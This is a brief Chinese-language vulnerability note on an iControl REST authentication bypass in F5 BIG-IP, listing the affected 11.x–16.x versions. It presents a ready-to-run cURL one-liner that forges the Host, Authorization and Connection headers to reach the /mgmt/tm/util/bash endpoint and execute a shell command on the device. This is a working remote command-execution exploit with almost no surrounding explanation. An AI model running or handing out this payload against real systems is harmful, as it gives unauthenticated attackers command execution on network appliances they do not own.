在 F5 BIG-IP 16.1.x 版本(早于 16.1.2.2)、15.1.x 版本(早于 15.1.5.1)、14.1.x 版本(早于 14.1.4.6)、13.1.x 版本(早于 13.1.5)以及所有 12.1.x 和 11.6.x 版本中,未公开的请求可能绕过 iControl REST 身份验证。
使用以下 cURL 单行命令测试此漏洞。
curl -k --header "Host: 127.0.0.1" --header "Authorization: Basic YWRtaW46YWRtaW4=" --header "X-F5-Auth-Token: asdf" --header "Connection: X-F5-Auth-Token" --header "Content-Type: application/json" https://$IPADDRESS /mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'